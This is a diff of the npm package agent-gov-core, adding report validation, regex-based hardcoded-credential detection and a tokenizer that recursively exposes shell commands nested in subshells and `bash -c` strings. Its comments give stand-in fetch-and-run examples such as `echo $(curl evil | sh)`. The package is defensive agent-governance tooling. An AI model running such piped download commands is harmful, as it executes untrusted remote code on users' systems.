agent-gov-core 0.4.3 → 0.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,85 @@
1
+ import { type Finding, type Severity, type ToolKind } from './finding.js';
2
+ /** Canonical envelope version. */
3
+ export declare const REPORT_SCHEMA_VERSION: "1.0";
4
+ /**
5
+ * Canonical multi-tool report envelope. Wraps `Finding[]` with provenance,
6
+ * rating, and optional tool-specific extension data so a cross-tool
7
+ * meta-reviewer can ingest reports from N tools through one shape.
8
+ */
9
+ export interface Report {
10
+ schemaVersion: typeof REPORT_SCHEMA_VERSION;
11
+ tool: ToolKind;
12
+ toolVersion?: string;
13
+ runId?: string;
14
+ /**
15
+ * Identifier for the agent session, PR review, or thread this run belongs to.
16
+ * Distinct from `runId` (which identifies *this* tool run): one conversation
17
+ * can produce many runs. Matches OpenTelemetry's `gen_ai.conversation.id`
18
+ * semantic convention — if a consumer also emits OTel traces about the same
19
+ * agent session, pass the same string here and downstream tooling can cross-
20
+ * reference governance findings with the traces.
21
+ *
22
+ * @see https://opentelemetry.io/docs/specs/semconv/gen-ai/
23
+ */
24
+ conversationId?: string;
25
+ baseRef?: string;
26
+ headRef?: string;
27
+ /** Aggregate severity. `'none'` iff findings is empty or all below threshold. */
28
+ rating: 'none' | Severity;
29
+ findings: Finding[];
30
+ /** Tool-specific extension data (PolicyMesh `effectiveUnion`, CapabilityEcho `surfaceSummary`, etc). */
31
+ data?: Record<string, unknown>;
32
+ }
33
+ export interface CreateReportSpec {
34
+ tool: ToolKind;
35
+ toolVersion?: string;
36
+ runId?: string;
37
+ /** See {@link Report.conversationId}. */
38
+ conversationId?: string;
39
+ baseRef?: string;
40
+ headRef?: string;
41
+ findings: Finding[];
42
+ data?: Record<string, unknown>;
43
+ /**
44
+ * Explicit rating override. When omitted, `rating` is computed as the
45
+ * maximum severity across `findings` (or `'none'` if empty).
46
+ */
47
+ rating?: 'none' | Severity;
48
+ }
49
+ /**
50
+ * Build a {@link Report} with `schemaVersion` set and `rating` derived from
51
+ * the maximum finding severity (unless overridden). This is the recommended
52
+ * way to produce a report — sets the envelope version correctly and computes
53
+ * the rating consistently with other tools.
54
+ *
55
+ * @example
56
+ * const report = createReport({
57
+ * tool: 'scope_trail',
58
+ * toolVersion: '0.1.18',
59
+ * baseRef: 'abc123',
60
+ * headRef: 'def456',
61
+ * findings: [finding1, finding2],
62
+ * data: { mcpServers: [...] },
63
+ * });
64
+ */
65
+ export declare function createReport(spec: CreateReportSpec): Report;
66
+ /**
67
+ * Maximum severity across a finding list. Returns `'none'` for empty input.
68
+ * Used by {@link createReport} when no explicit rating is supplied.
69
+ */
70
+ export declare function maxSeverity(findings: readonly Finding[]): 'none' | Severity;
71
+ export interface ReportValidationResult {
72
+ ok: boolean;
73
+ errors: string[];
74
+ }
75
+ /**
76
+ * Runtime check that a value conforms to the canonical Report envelope.
77
+ * Aggregates errors across all findings — a single malformed finding does
78
+ * not short-circuit the rest of the envelope check.
79
+ *
80
+ * @example
81
+ * const result = validateReport(JSON.parse(reportJson));
82
+ * if (!result.ok) console.error(result.errors.join('\n'));
83
+ */
84
+ export declare function validateReport(value: unknown): ReportValidationResult;
85
+ //# sourceMappingURL=report.d.ts.map
package/dist/report.js ADDED
@@ -0,0 +1,156 @@
1
+ import { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, validateFinding, } from './finding.js';
2
+ /** Canonical envelope version. */
3
+ export const REPORT_SCHEMA_VERSION = '1.0';
4
+ /**
5
+ * Build a {@link Report} with `schemaVersion` set and `rating` derived from
6
+ * the maximum finding severity (unless overridden). This is the recommended
7
+ * way to produce a report — sets the envelope version correctly and computes
8
+ * the rating consistently with other tools.
9
+ *
10
+ * @example
11
+ * const report = createReport({
12
+ * tool: 'scope_trail',
13
+ * toolVersion: '0.1.18',
14
+ * baseRef: 'abc123',
15
+ * headRef: 'def456',
16
+ * findings: [finding1, finding2],
17
+ * data: { mcpServers: [...] },
18
+ * });
19
+ */
20
+ export function createReport(spec) {
21
+ const report = {
22
+ schemaVersion: REPORT_SCHEMA_VERSION,
23
+ tool: spec.tool,
24
+ rating: spec.rating ?? maxSeverity(spec.findings),
25
+ findings: spec.findings,
26
+ };
27
+ if (spec.toolVersion !== undefined)
28
+ report.toolVersion = spec.toolVersion;
29
+ if (spec.runId !== undefined)
30
+ report.runId = spec.runId;
31
+ if (spec.conversationId !== undefined)
32
+ report.conversationId = spec.conversationId;
33
+ if (spec.baseRef !== undefined)
34
+ report.baseRef = spec.baseRef;
35
+ if (spec.headRef !== undefined)
36
+ report.headRef = spec.headRef;
37
+ if (spec.data !== undefined)
38
+ report.data = spec.data;
39
+ return report;
40
+ }
41
+ /**
42
+ * Maximum severity across a finding list. Returns `'none'` for empty input.
43
+ * Used by {@link createReport} when no explicit rating is supplied.
44
+ */
45
+ export function maxSeverity(findings) {
46
+ let best = 'none';
47
+ for (const f of findings) {
48
+ if (severityRank(f.severity) > severityRank(best))
49
+ best = f.severity;
50
+ }
51
+ return best;
52
+ }
53
+ function severityRank(s) {
54
+ if (s === 'none')
55
+ return 0;
56
+ if (s === 'low')
57
+ return 1;
58
+ if (s === 'medium')
59
+ return 2;
60
+ if (s === 'high')
61
+ return 3;
62
+ return 4;
63
+ }
64
+ const REPORT_ALLOWED_KEYS = new Set([
65
+ 'schemaVersion',
66
+ 'tool',
67
+ 'toolVersion',
68
+ 'runId',
69
+ 'conversationId',
70
+ 'baseRef',
71
+ 'headRef',
72
+ 'rating',
73
+ 'findings',
74
+ 'data',
75
+ ]);
76
+ const RATING_VALUES = new Set(['none', ...SEVERITIES]);
77
+ /**
78
+ * Runtime check that a value conforms to the canonical Report envelope.
79
+ * Aggregates errors across all findings — a single malformed finding does
80
+ * not short-circuit the rest of the envelope check.
81
+ *
82
+ * @example
83
+ * const result = validateReport(JSON.parse(reportJson));
84
+ * if (!result.ok) console.error(result.errors.join('\n'));
85
+ */
86
+ export function validateReport(value) {
87
+ const errors = [];
88
+ if (value === null || typeof value !== 'object' || Array.isArray(value)) {
89
+ return { ok: false, errors: ['report must be a plain object'] };
90
+ }
91
+ const v = value;
92
+ if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
93
+ errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
94
+ }
95
+ if (!isToolKind(v.tool)) {
96
+ errors.push(`tool must be one of: ${TOOL_KINDS.join(', ')}`);
97
+ }
98
+ if (typeof v.rating !== 'string' || !RATING_VALUES.has(v.rating)) {
99
+ errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
100
+ }
101
+ if (!Array.isArray(v.findings)) {
102
+ errors.push('findings must be an array');
103
+ }
104
+ else {
105
+ for (let i = 0; i < v.findings.length; i++) {
106
+ const f = validateFinding(v.findings[i]);
107
+ if (!f.ok) {
108
+ errors.push(`findings[${i}]: ${f.errors.join('; ')}`);
109
+ }
110
+ else if (isToolKind(v.tool) && v.findings[i].tool !== v.tool) {
111
+ errors.push(`findings[${i}].tool ('${v.findings[i].tool}') does not match report.tool ('${v.tool}')`);
112
+ }
113
+ }
114
+ }
115
+ if (v.toolVersion !== undefined && typeof v.toolVersion !== 'string') {
116
+ errors.push('toolVersion must be a string when present');
117
+ }
118
+ if (v.runId !== undefined && typeof v.runId !== 'string') {
119
+ errors.push('runId must be a string when present');
120
+ }
121
+ if (v.conversationId !== undefined && typeof v.conversationId !== 'string') {
122
+ errors.push('conversationId must be a string when present');
123
+ }
124
+ if (v.baseRef !== undefined && typeof v.baseRef !== 'string') {
125
+ errors.push('baseRef must be a string when present');
126
+ }
127
+ if (v.headRef !== undefined && typeof v.headRef !== 'string') {
128
+ errors.push('headRef must be a string when present');
129
+ }
130
+ if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
131
+ errors.push('data must be an object when present');
132
+ }
133
+ for (const key of Object.keys(v)) {
134
+ if (!REPORT_ALLOWED_KEYS.has(key))
135
+ errors.push(`unknown property: ${key}`);
136
+ }
137
+ // Cross-field consistency: rating should be at or above the max finding severity.
138
+ // We don't *enforce* this strictly (a tool may downgrade by policy) but flag a
139
+ // genuine inconsistency where the rating is BELOW what the findings imply.
140
+ if (Array.isArray(v.findings) &&
141
+ typeof v.rating === 'string' &&
142
+ RATING_VALUES.has(v.rating)) {
143
+ const findingsOk = v.findings.every((f) => validateFinding(f).ok);
144
+ if (findingsOk) {
145
+ const implied = maxSeverity(v.findings);
146
+ if (severityRank(v.rating) < severityRank(implied)) {
147
+ errors.push(`rating '${v.rating}' is below the maximum finding severity '${implied}'`);
148
+ }
149
+ }
150
+ }
151
+ // Ensure isSeverity-style check on rating when not 'none' for callers that
152
+ // need a tighter type than the wider RATING_VALUES set.
153
+ void isSeverity;
154
+ return { ok: errors.length === 0, errors };
155
+ }
156
+ //# sourceMappingURL=report.js.map
@@ -0,0 +1,67 @@
1
+ /**
2
+ * Hardcoded credential detection.
3
+ *
4
+ * Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
5
+ * Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
6
+ * pattern that only fires in env/header context (a bare hex blob in a
7
+ * positional command argument is indistinguishable from a commit SHA).
8
+ *
9
+ * Contract: the literal credential is NEVER returned in any field. Callers
10
+ * receive only the provider name plus the pattern that matched (provider
11
+ * label only — not the regex). This is the same contract PolicyMesh shipped
12
+ * the detector under, lifted into the substrate so every governance tool
13
+ * uses one source of truth for "what does a hardcoded credential look like."
14
+ *
15
+ * @example
16
+ * import { matchSecret } from 'agent-gov-core';
17
+ *
18
+ * matchSecret('sk-ant-abcdefghijklmnopqrstuv');
19
+ * // → { provider: 'Anthropic' }
20
+ *
21
+ * matchSecret('env:OPENAI_API_KEY');
22
+ * // → undefined (env var reference, not a literal)
23
+ *
24
+ * matchSecret('a'.repeat(40), { envOrHeaderContext: true });
25
+ * // → undefined (only A-F0-9 are hex; not a hex token)
26
+ */
27
+ export interface SecretMatch {
28
+ /** Human-readable provider name. The literal credential is NEVER included. */
29
+ provider: string;
30
+ }
31
+ export interface MatchSecretOptions {
32
+ /**
33
+ * When `true`, patterns flagged `envOrHeaderOnly` are eligible. Set this
34
+ * only when scanning env values or HTTP header values — never when scanning
35
+ * a joined launch command (positional args often contain commit SHAs that
36
+ * would false-positive against a bare hex token pattern).
37
+ */
38
+ envOrHeaderContext?: boolean;
39
+ }
40
+ interface SecretPattern {
41
+ provider: string;
42
+ regex: RegExp;
43
+ /** See {@link MatchSecretOptions.envOrHeaderContext}. */
44
+ envOrHeaderOnly?: boolean;
45
+ }
46
+ /**
47
+ * Built-in provider patterns. Conservative — only shapes whose prefix
48
+ * unambiguously identifies a credential class. The bare hex pattern is gated
49
+ * to env/header context to avoid commit-SHA false positives.
50
+ *
51
+ * Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
52
+ * require a major bump (the golden compatibility tests in `test/golden.test.mjs`
53
+ * pin the current provider set).
54
+ */
55
+ export declare const SECRET_PATTERNS: readonly Readonly<SecretPattern>[];
56
+ /**
57
+ * Scan `value` for a hardcoded provider credential. Returns the matched
58
+ * provider name (never the literal credential) or `undefined` when nothing
59
+ * matches.
60
+ *
61
+ * Set `options.envOrHeaderContext` to `true` only when scanning env values
62
+ * or HTTP header values — that enables the more permissive hex-token pattern
63
+ * which would false-positive on positional command arguments.
64
+ */
65
+ export declare function matchSecret(value: string, options?: MatchSecretOptions): SecretMatch | undefined;
66
+ export {};
67
+ //# sourceMappingURL=secrets.d.ts.map
@@ -0,0 +1,81 @@
1
+ /**
2
+ * Hardcoded credential detection.
3
+ *
4
+ * Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
5
+ * Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
6
+ * pattern that only fires in env/header context (a bare hex blob in a
7
+ * positional command argument is indistinguishable from a commit SHA).
8
+ *
9
+ * Contract: the literal credential is NEVER returned in any field. Callers
10
+ * receive only the provider name plus the pattern that matched (provider
11
+ * label only — not the regex). This is the same contract PolicyMesh shipped
12
+ * the detector under, lifted into the substrate so every governance tool
13
+ * uses one source of truth for "what does a hardcoded credential look like."
14
+ *
15
+ * @example
16
+ * import { matchSecret } from 'agent-gov-core';
17
+ *
18
+ * matchSecret('sk-ant-abcdefghijklmnopqrstuv');
19
+ * // → { provider: 'Anthropic' }
20
+ *
21
+ * matchSecret('env:OPENAI_API_KEY');
22
+ * // → undefined (env var reference, not a literal)
23
+ *
24
+ * matchSecret('a'.repeat(40), { envOrHeaderContext: true });
25
+ * // → undefined (only A-F0-9 are hex; not a hex token)
26
+ */
27
+ /**
28
+ * Built-in provider patterns. Conservative — only shapes whose prefix
29
+ * unambiguously identifies a credential class. The bare hex pattern is gated
30
+ * to env/header context to avoid commit-SHA false positives.
31
+ *
32
+ * Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
33
+ * require a major bump (the golden compatibility tests in `test/golden.test.mjs`
34
+ * pin the current provider set).
35
+ */
36
+ export const SECRET_PATTERNS = [
37
+ { provider: 'Anthropic', regex: /sk-ant-[A-Za-z0-9_-]{20,}/ },
38
+ { provider: 'OpenAI', regex: /sk-proj-[A-Za-z0-9_-]{20,}/ },
39
+ { provider: 'OpenAI', regex: /sk-(?!ant-|proj-)[A-Za-z0-9]{32,}/ },
40
+ { provider: 'GitHub', regex: /gh[pousr]_[A-Za-z0-9]{36,}/ },
41
+ { provider: 'GitHub', regex: /github_pat_[A-Za-z0-9_]{20,}/ },
42
+ { provider: 'Slack', regex: /xox[abprs]-[A-Za-z0-9-]{20,}/ },
43
+ { provider: 'AWS', regex: /AKIA[0-9A-Z]{16}/ },
44
+ { provider: 'Google', regex: /AIza[0-9A-Za-z_-]{35}/ },
45
+ { provider: 'GitLab', regex: /glpat-[A-Za-z0-9_-]{20,}/ },
46
+ { provider: 'npm', regex: /npm_[A-Za-z0-9]{36}/ },
47
+ { provider: 'Docker', regex: /dckr_pat_[A-Za-z0-9_-]{20,}/ },
48
+ { provider: 'Stripe', regex: /(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{20,}/ },
49
+ // env/header context only — see comment block at top of file.
50
+ { provider: 'Hex token', regex: /(?:^|[^A-Fa-f0-9])([A-Fa-f0-9]{40,})(?:$|[^A-Fa-f0-9])/, envOrHeaderOnly: true },
51
+ ];
52
+ /**
53
+ * Prefix marking an environment-variable reference. Values starting with
54
+ * `env:` are not literal credentials — they're a reference resolved at
55
+ * runtime by the consuming tool (Codex notation). Skipped during scanning.
56
+ */
57
+ const ENV_REFERENCE_PREFIX = 'env:';
58
+ /**
59
+ * Scan `value` for a hardcoded provider credential. Returns the matched
60
+ * provider name (never the literal credential) or `undefined` when nothing
61
+ * matches.
62
+ *
63
+ * Set `options.envOrHeaderContext` to `true` only when scanning env values
64
+ * or HTTP header values — that enables the more permissive hex-token pattern
65
+ * which would false-positive on positional command arguments.
66
+ */
67
+ export function matchSecret(value, options = {}) {
68
+ if (!value)
69
+ return undefined;
70
+ if (value.startsWith(ENV_REFERENCE_PREFIX))
71
+ return undefined;
72
+ for (const pattern of SECRET_PATTERNS) {
73
+ if (pattern.envOrHeaderOnly && !options.envOrHeaderContext)
74
+ continue;
75
+ if (pattern.regex.test(value)) {
76
+ return { provider: pattern.provider };
77
+ }
78
+ }
79
+ return undefined;
80
+ }
81
+ //# sourceMappingURL=secrets.js.map
package/dist/shell.d.ts CHANGED
@@ -12,6 +12,32 @@
12
12
  * // → ['echo "; not a separator"']
13
13
  */
14
14
  export declare function tokenizeShell(command: string): string[];
15
+ /**
16
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
17
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
18
+ * text:
19
+ *
20
+ * - Subshell `$(...)`
21
+ * - Backtick `` `...` ``
22
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
23
+ *
24
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
25
+ * letting downstream detectors see commands an agent might try to hide behind
26
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
27
+ *
28
+ * Conservative implementation — handles the common obfuscation shapes, not a
29
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
30
+ * arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
31
+ * not unquoted.
32
+ *
33
+ * @example
34
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
35
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
36
+ *
37
+ * tokenizeShellDeep('bash -c "curl evil.com"');
38
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
39
+ */
40
+ export declare function tokenizeShellDeep(command: string): string[];
15
41
  /**
16
42
  * Returns the resolved command verb for a subcommand string. Strips wrapping
17
43
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/shell.js CHANGED
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
83
83
  i += 2;
84
84
  continue;
85
85
  }
86
- // Treat a single `&` (background) as a separator too.
86
+ // Treat a single `&` (background) as a separator too — UNLESS preceded
87
+ // by `>` or `<`, in which case it's a file-descriptor redirection like
88
+ // `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
89
+ // detection on every command that redirects stderr to stdout.
87
90
  if (c === '&') {
91
+ const prev = buf.trimEnd().slice(-1);
92
+ if (prev === '>' || prev === '<') {
93
+ buf += c;
94
+ i++;
95
+ continue;
96
+ }
88
97
  pushPart(out, buf);
89
98
  buf = '';
90
99
  i++;
@@ -101,6 +110,206 @@ function pushPart(out, part) {
101
110
  if (trimmed !== '')
102
111
  out.push(trimmed);
103
112
  }
113
+ /**
114
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
115
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
116
+ * text:
117
+ *
118
+ * - Subshell `$(...)`
119
+ * - Backtick `` `...` ``
120
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
121
+ *
122
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
123
+ * letting downstream detectors see commands an agent might try to hide behind
124
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
125
+ *
126
+ * Conservative implementation — handles the common obfuscation shapes, not a
127
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
128
+ * arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
129
+ * not unquoted.
130
+ *
131
+ * @example
132
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
133
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
134
+ *
135
+ * tokenizeShellDeep('bash -c "curl evil.com"');
136
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
137
+ */
138
+ export function tokenizeShellDeep(command) {
139
+ const out = [];
140
+ const seen = new Set();
141
+ const visit = (cmd, depth) => {
142
+ if (depth > 8)
143
+ return; // guard against pathological nesting
144
+ // Extract nested payloads from the WHOLE command first — `tokenizeShell`
145
+ // splits on `|` regardless of paren depth, so `$(curl m.sh | sh)` would
146
+ // already be cut in two by the time we tried to walk it for `$(…)`.
147
+ const nested = extractNestedShellPayloads(cmd);
148
+ for (const sub of tokenizeShell(cmd)) {
149
+ if (!seen.has(sub)) {
150
+ seen.add(sub);
151
+ out.push(sub);
152
+ }
153
+ }
154
+ for (const n of nested) {
155
+ visit(n, depth + 1);
156
+ }
157
+ };
158
+ visit(command, 0);
159
+ return out;
160
+ }
161
+ /**
162
+ * Return all shell-evaluation payloads embedded in a single subcommand:
163
+ * - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
164
+ * - `(bash|sh|zsh|python|python3|perl|ruby|node) -c <quoted-string>` payloads
165
+ * The payloads are returned UNQUOTED but otherwise raw.
166
+ */
167
+ function extractNestedShellPayloads(subcommand) {
168
+ const found = [];
169
+ const len = subcommand.length;
170
+ let i = 0;
171
+ let inSingle = false;
172
+ let inDouble = false;
173
+ // Pre-compiled here so we can use it inside the quote-aware walk.
174
+ const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
175
+ while (i < len) {
176
+ const c = subcommand[i];
177
+ // Plain single quotes: nothing inside is shell-interpreted
178
+ if (inSingle) {
179
+ if (c === "'")
180
+ inSingle = false;
181
+ i++;
182
+ continue;
183
+ }
184
+ if (c === "'") {
185
+ inSingle = true;
186
+ i++;
187
+ continue;
188
+ }
189
+ // Inside double quotes, `$(…)` and backticks STILL evaluate, so we
190
+ // keep scanning. Just remember to re-enable detection of an outer
191
+ // closing `"`.
192
+ if (c === '"') {
193
+ inDouble = !inDouble;
194
+ i++;
195
+ continue;
196
+ }
197
+ // $(...)
198
+ if (c === '$' && subcommand[i + 1] === '(') {
199
+ const body = readBalanced(subcommand, i + 2, '(', ')');
200
+ if (body !== null) {
201
+ found.push(body.content);
202
+ i = body.endIndex;
203
+ continue;
204
+ }
205
+ }
206
+ // Backticks
207
+ if (c === '`') {
208
+ const close = subcommand.indexOf('`', i + 1);
209
+ if (close !== -1) {
210
+ found.push(subcommand.slice(i + 1, close));
211
+ i = close + 1;
212
+ continue;
213
+ }
214
+ }
215
+ // `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
216
+ // `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
217
+ // Match boundary: only at start-of-string OR after whitespace / a chain
218
+ // separator.
219
+ if (!inDouble) {
220
+ const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
221
+ if (atBoundary) {
222
+ const tail = subcommand.slice(i);
223
+ const dashCMatch = dashCMatcher.exec(tail);
224
+ if (dashCMatch) {
225
+ const afterFlag = i + dashCMatch[0].length;
226
+ const payload = readQuotedArg(subcommand, afterFlag);
227
+ if (payload !== null)
228
+ found.push(payload);
229
+ // Skip past the matched `bash -c ` prefix so the walk continues
230
+ // from the argument position; we don't try to compute where the
231
+ // quoted arg ends (the next iteration will hit the quote and toggle
232
+ // inDouble naturally).
233
+ i = afterFlag;
234
+ continue;
235
+ }
236
+ }
237
+ }
238
+ i++;
239
+ }
240
+ return found;
241
+ }
242
+ /** Read a balanced `open`/`close` body starting at `start` (already past the open). */
243
+ function readBalanced(input, start, open, close) {
244
+ let depth = 1;
245
+ let i = start;
246
+ let inSingle = false;
247
+ let inDouble = false;
248
+ while (i < input.length) {
249
+ const c = input[i];
250
+ if (inSingle) {
251
+ if (c === "'")
252
+ inSingle = false;
253
+ i++;
254
+ continue;
255
+ }
256
+ if (c === "'") {
257
+ inSingle = true;
258
+ i++;
259
+ continue;
260
+ }
261
+ if (c === '"') {
262
+ inDouble = !inDouble;
263
+ i++;
264
+ continue;
265
+ }
266
+ if (!inDouble) {
267
+ if (c === open)
268
+ depth++;
269
+ else if (c === close) {
270
+ depth--;
271
+ if (depth === 0)
272
+ return { content: input.slice(start, i), endIndex: i + 1 };
273
+ }
274
+ }
275
+ i++;
276
+ }
277
+ return null;
278
+ }
279
+ /**
280
+ * Read the next quoted (single, double) or bare token starting at `start`,
281
+ * returning its unquoted contents.
282
+ */
283
+ function readQuotedArg(input, start) {
284
+ let i = start;
285
+ while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
286
+ i++;
287
+ if (i >= input.length)
288
+ return null;
289
+ const q = input[i];
290
+ if (q === '"' || q === "'") {
291
+ let j = i + 1;
292
+ let buf = '';
293
+ while (j < input.length) {
294
+ const c = input[j];
295
+ if (c === '\\' && q === '"' && j + 1 < input.length) {
296
+ buf += input[j + 1];
297
+ j += 2;
298
+ continue;
299
+ }
300
+ if (c === q)
301
+ return buf;
302
+ buf += c;
303
+ j++;
304
+ }
305
+ return null;
306
+ }
307
+ // Bare token — read up to whitespace
308
+ let j = i;
309
+ while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
310
+ j++;
311
+ return input.slice(i, j);
312
+ }
104
313
  /**
105
314
  * Returns the resolved command verb for a subcommand string. Strips wrapping
106
315
  * quotes, escape backslashes, and the inert-double-quote obfuscation